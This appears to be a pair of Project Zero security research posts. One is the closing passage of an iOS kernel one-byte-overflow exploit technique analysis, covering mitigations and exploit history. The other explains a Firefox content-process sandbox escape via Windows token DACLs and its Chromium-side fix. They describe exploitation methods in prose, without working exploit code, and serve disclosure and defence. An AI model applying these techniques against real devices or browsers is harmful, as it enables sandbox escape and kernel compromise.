The next mitigation is PPL, which stands for Page Protection Layer. PPL creates a security boundary between the code that manages page tables and the rest of the XNU kernel. This is the only mitigation besides PAN that impacted the development of this exploit technique.

In practice, PPL could be much stricter about which physical addresses it allows to be mapped into a userspace process. For example, there is no legitimate use case for a userspace process to have access to kernelcache pages, so setting a flag like PVH_FLAG_LOCKDOWN on kernelcache pages could be a weak but sensible step. More generally, addresses outside the Application Processor's DRAM region (including physical I/O addresses for hardware components) could probably be made unmappable for most processes, perhaps with an entitlement escape hatch for exceptional cases.

Finally, the last mitigation is zone_require, a software mitigation introduced in iOS 13 that checks that some kernel pointers are allocated from the expected zalloc zone before using them. I don't believe that XNU's zone allocator was initially intended as a security mitigation, but the fact remains that many objects that are frequently targeted during exploits (in particular ipc_ports, tasks, and threads) are allocated from a dedicated zone. This makes zone checks an effective funnel point for detecting exploitation shenanigans.

In theory, zone_require could be used to protect almost any object allocated from a dedicated zone; in practice, though, the vast majority of zone_require() checks in the kernelcache are on ipc_port objects. Because the one-byte technique avoids the use of fake Mach ports altogether, none of the existing zone_require() checks apply.

However, if the use of zone_require were expanded, it is possible to partially mitigate the technique. In particular, inserting a zone_require() call in vm_map_copyout_internal() once the vm_map_copy has been determined to be of type ENTRY_LIST would ensure that the vm_map_copy cannot be a KERNEL_BUFFER object with a corrupted type. Of course, like all mitigations, this isn't 100% robust: using the technique in an exploit would probably still be possible, but it might require a better initial primitive than a one-byte overflow.

"Appendix A": Annals of the exploits

In my opinion, the one-byte exploit technique outlined in this blog post is a divergence from the conventional strategies employed at least since iOS 10. Fully 19 of the 24 original public exploits that I could find since iOS 10 used dangling or fake Mach ports as an intermediate exploitation primitive. And of the 20 exploits released since iOS 10.3 (when Apple initially started locking down the kernel task port), 18 of those ended by constructing a fake kernel task port. This makes Mach ports the defining feature of modern public iOS kernel exploitation.

Having gone through the motions of using the one-byte technique to build a kernel read/write primitive on top of a simulated heap overflow, I certainly can see the logic of going after the kernel task port instead. Most of the exploits I looked at since iOS 10 have a relatively modular design and a linear flow: an initial primitive is obtained, state is manipulated, an exploitation technique is applied to build a stronger primitive, state is manipulated again, another technique is applied after that, and so on, until finally you have enough to build a fake kernel task port. There are checkpoints along the way: initial corruption, dangling Mach port, 4-byte read primitive, etc. The exact sequence of steps in each case is different, but in broad strokes the designs of different exploits converge. And because of this convergence, the last steps of one exploit are pretty much interchangeable with those of any other. The design of it all "feels clean".

That modularity is not true of this one-byte technique. Once you start the vm_map_copyout_internal() loop, you are committed to this course until after you've obtained a kernel read/write primitive. And because vm_map_copyout_internal() holds the vm_map lock for the duration of the loop, you can't perform any of the virtual memory operations (like allocating virtual memory) that would normally be integral steps in a conventional exploit flow. Writing this exploit thus feels different, more messy.

All that said, and at the risk of sounding like I'm tooting my own horn, the one-byte technique intuitively feels to me somewhat more "technically elegant": it turns a weaker precondition directly into a very strong primitive while sidestepping most mitigations and avoiding most sources of instability and slowness seen in public iOS exploits. Of the 24 iOS exploits I looked at, 22 depend on reallocating a slot for an object that has been recently freed with another object, many doing so multiple times; with the notable exception of SockPuppet, this is an inherently risky operation because another thread could race to reallocate that slot instead. Furthermore, 11 of the 19 exploits since iOS 11 depend on forcing a zone garbage collection, an even riskier step that often takes a few seconds to complete.

Meanwhile, the one-byte technique has no inherent sources of instability or substantial time costs. It looks more like the type of technique I would expect sophisticated attackers would be interested in developing. And even if something goes wrong during the exploit and a bad address is dereferenced in the kernel, the fact that the vm_map lock is held means that the fault results in a deadlock rather than a kernel panic, making the failed exploit look like a frozen process instead of a system crash. (You can even "kill" the deadlocked app in the app switcher UI and then continue using the device afterwards.)

"Appendix B": Conclusions

I'll conclude by returning to the three questions posed at the very beginning of this post:

Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

These questions are all too "fuzzy" to have real answers, but I'll attempt to answer them anyway.

To the first question, I think the answer is no, the kernel task port is not the singular best exploit flow. In my opinion the one-byte technique is just as good by most measures, and in my personal opinion, I expect there are other as-yet unpublished techniques that are also equally good.

To the second question, on whether the convergence on the kernel task port has obscured other techniques: I don't think there is enough public iOS research to say conclusively, but my intuition is yes. In my own experience, knowing the type of bug I'm looking for has influenced the types of bugs I find, and looking at past exploits has guided my choice in exploit flow. I would not be surprised to learn others feel similarly.

Finally, are existing iOS kernel exploit mitigations effective against unseen exploit flows? Immediately after I developed the POC for the one-byte technique, I had thought the answer was no; but here at the end of this journey, I'm less certain. I don't think PPL was specifically designed to prevent this technique, but it offers a very reasonable place to mitigate it. PAC didn't do anything to block the technique, but it's plausible that a future expansion of PAC-protected pointers would. And despite the fact that zone_require didn't impact the exploit at all, a single-line addition would strengthen the required precondition from a single-byte overflow to a larger overflow that crosses a zone boundary. So, even though in their current form Apple's kernel exploit mitigations were not effective against this unseen technique, they do lay the necessary groundwork to make mitigating the technique straightforward.

Indices

One final parting thought. In Deja-XNU, published 2018, Ian Beer mused about what the "state-of-the-art" of iOS kernel exploitation might have looked like four years prior:

An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.

This is an important question to consider because, as defenders, we almost never get to see the capabilities of the most sophisticated attackers. If a gap develops between the techniques used by attackers in private and the techniques known to defenders, then defenders may waste resources mitigating against the wrong techniques.

I don't think this technique represents the current state-of-the-art; I'd guess that, like Deja-XNU, it might represent the state-of-the-art of a few years ago. It's worth considering what direction the state-of-the-art may have taken in the meantime.
...more

FF Sandbox Escape (CVE-2020-12388)

Published: 2020-06-17 15:58:00

Popularity: 301

Author: Unknown

By James Forshaw, Project Zero


In my previous blog post I discussed an issue with the Windows Kernel’s handling of Restricted Tokens which allowed me to escape the Chrome GPU sandbox. Originally I’d planned to use Firefox for the proof-of-concept as Firefox uses the same effective sandbox level as the Chrome GPU process for its content renderers. That means a FF content RCE would give code execution in a sandbox where you could abuse the Windows Kernel Restricted Tokens issue, making it much more serious.

However, while researching the sandbox escape I realized that was the least of FF’s worries.  The use of the GPU level sandbox for multiple processes introduced a sandbox escape vector, even once the Windows issue was fixed. This blog post is about the specific behavior of the Chromium sandbox and why FF was vulnerable. I’ll also detail the changes I made to the Chromium sandbox to introduce a way of mitigating the issue which was used by Mozilla to fix my report.

For reference the P0 issue is 2016 and the FF issue is 1618911. FF define their own sandboxing profiles defined on this page. The content sandbox at the time of writing is defined as Level 5, so I’ll refer to L5 going forward rather than a GPU sandbox.

Root Cause

The root cause of the issue is that with L5, one content process can open another for full access. In Chromium derived browsers this isn’t usually an issue, only one GPU process is running at a time, although there could be other non-Chromium processes running at the same time which might be accessible. The sandbox used by content renderers in Chromium are significantly more limited and they should not be able to open any other processes.

The L5 sandbox uses a Restricted Token as the primary sandbox enforcement. The reason one content process can access another is down to the Default DACL of the Primary Token of the process. For a content process the Default DACL which is set in RestrictedToken::GetRestrictedToken grants full access to the following users:

User
Access
Current User
Full Access
NT AUTHORITY\SYSTEM
Full Access
NT AUTHORITY\RESTRICTED
Full Access
Logon SID
Read and Execute Access

The Default DACL is used to set the initial Process and Thread Security Descriptors. The Token level used by L5 is USER_LIMITED which disables almost all groups except for:
  • Current User
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\INTERACTIVE
  • Logon SID

And adds the following restricted SIDs:
  • BUILTIN\Users
  • Everyone
  • NT AUTHORITY\RESTRICTED
  • Logon SID.

Tying all this together the combination of the Current User Group and the RESTRICTED restricted SID results in granting full access to the sandbox Process or Thread.

To understand why being able to open another content process was such a problem, we have to understand how the Chromium sandbox bootstraps a new process. Due to the way Primary Tokens are assigned to a new process, once the process starts it can no longer be changed for a different token. You can do a few things, such as deleting privileges and dropping the Integrity Level, but removing groups or adding new restricted SIDs isn’t possible. 

A new sandboxed process needs to do some initial warm up which might require more access than is granted to the restricted sandbox Token, so Chromium uses a trick. It assigns a more privileged Impersonation Token to the initial thread, so that the warmup runs with higher privileges. For L5 the level for the initial Token is USER_RESTRICTED_SAME_ACCESS which just creates a Restricted Token with no disabled groups and all the normal groups added as restricted SIDs. This makes the Token almost equivalent to a normal Token but is considered Restricted. Windows would block setting the Token if the Primary Token is Restricted but the Impersonation Token is not.

The Impersonation Token is dropped once all warmup has completed by calling the LowerToken function in the sandbox target services. What this means is there’s a time window when a new sandbox process starts to when LowerToken is called where the process is effectively running unsandboxed, except for having a Low IL. If you could hijack execution before the impersonation is dropped you could immediately gain privileges, sufficient to escape the sandbox.


Unlike the Chrome GPU process FF will spawn a new content process regularly during normal use. Just creating a new tab can spawn a new process. Therefore one compromised content process only has to wait around until a new process is created then immediately hijack it. A compromised renderer can almost certainly force a new process to be created through an IPC call, but I didn’t investigate that further.

With this knowledge I developed a full POC using many of the same techniques as in the previous blog post. The higher privileges of the USER_RESTRICTED_SAME_ACCESS Token simplifies the exploit. For example we no longer need to hijack the COM Server’s thread as the more privileged Token allows us to directly open the process. Also, crucially we never need to leave the Restricted Sandbox therefore the exploit doesn’t rely on the kernel bug MS fixed for the previous issue. You can find the full POC attached to the issue, and I’ve summarised the steps in the following diagram.


Developing a Fix

In my report I suggested a fix for the issue, enabling the SetLockdownDefaultDacl option in the sandbox policy. SetLockdownDefaultDacl removes both the RESTRICTED and Logon SIDs from the Default DACL which would prevent one L5 process opening another. I had added this sandbox policy function in response to the GPU sandbox escape I mentioned in the previous blog, which was used by lokihardt at Pwn2Own. However the intention was to block the GPU process opening a renderer process and not to prevent one GPU process from opening another. Therefore the policy was not set on the GPU sandbox, but only on renderers.

It turns out that I wasn’t the first person to report the ability of one FF content process opening another. Niklas Baumstark had reported it a year prior to my report. The fix I had suggested, enabling SetLockdownDefaultDacl had been tried in fixing Niklas’ report and it broke various things including the DirectWrite cache and Audio Playback as well as significant performance regressions which made applying SetLockdownDefaultDacl undesirable. The reason things such as the DirectWrite cache break is due to a typical coding pattern in Windows RPC services as shown below:

int RpcCall(handle_t handle, LPCWSTR some_value) {
  DWORD pid;
  I_RpcBindingInqLocalClientPID(handle, &pid);

  RpcImpersonateClient(handle);
  HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, nullptr, pid);
  if (!process)
    return ERROR_ACCESS_DENIED;

  ...
}

This example code is running in a privileged service and is called over RPC by the sandboxed application. It first calls the RPC runtime to query the caller’s Process ID. Then it impersonates the caller and tries to open a handle to the calling process. If opening the process fails then the RPC call returns an access denied error.

For normal applications it’s a perfectly reasonable assumption that the caller can access its own process. However, once we lockdown the process security this is no longer the case. If we’re blocking access to other processes at the same level then as a consequence we also block opening our own process. Normally this isn’t an issue as most code inside the process uses the Current Process Pseudo handle which never goes through an access check.

Niklas’ report didn’t come with a full sandbox escape. The lack of a full POC plus the difficulty in fixing it resulted in the fix stalling. However, with a full sandbox escape demonstrating the impact of the issue, Mozilla would have to choose between performance or  security unless another fix could be implemented. As I’m a Chromium committer as well as an owner of the Windows sandbox I realized I might be better placed to fix this than Mozilla who relied on our code.

The fix must do two things:
  • Grant the process access to its own process and threads.
  • Deny any other process at the same level.

Without any administrator privileges many angles, such as Kernel Process Callbacks are not available to us. The fix must be entirely in user-mode with normal user privileges. 

The key to the fix is the list of restricted SIDs can include SIDs which are not present in the Token’s existing groups. We can generate a random SID per-sandbox process which is added both as a restricted SID and into the Default DACL. We can then use SetLockdownDefaultDacl to lockdown the Default DACL.

When opening the process the access check will match on the Current User SID for the normal check, and the Random SID for the restricted SID check. This will also work over RPC. However, each content process will have a different Random SID, so while the normal check will still pass, the access check can’t successfully pass the restricted SID check. This achieves our goals. You can check the implementation in PolicyBase::MakeTokens.

I added the patch to the Chromium repository and FF was able to merge it and test it. It worked to block the attack vector as well as seemingly not introducing the previous performance issues. I say, “seemingly,” as part of the problem with any changes such as this is that it’s impossible to know for certain that some RPC service or other code doesn’t rely on specific behaviors to function which a change breaks. However, this code is now shipping in FF76 so no doubt it’ll become apparent if there are issues. 

Another problem with the fix is it’s opt-in, to be secure every other process on the system has to opt in to the mitigation including all Chromium browsers as well as users of Chromium such as Electron. For example, if Chrome isn’t updated then a FF content process could kill Chrome’s GPU process, that would cause Chrome to restart it and the FF process could escape via Chrome by hijacking the new GPU process. This is why, even though not directly vulnerable, I enabled the mitigation on the Chromium GPU process which has shipped in M83 (and Microsoft Edge 83) released at the end of April 2020.

In conclusion, this blog post demonstrated a sandbox escape in FF which required adding a new feature to the Chromium sandbox. In contrast to the previous blog post it was possible to remediate the issue without requiring a change in Windows code that FF or Chromium don’t have access to. That said, it’s likely we were lucky that it was possible to change without breaking anything important. Next time it might not be so easy.
...more

end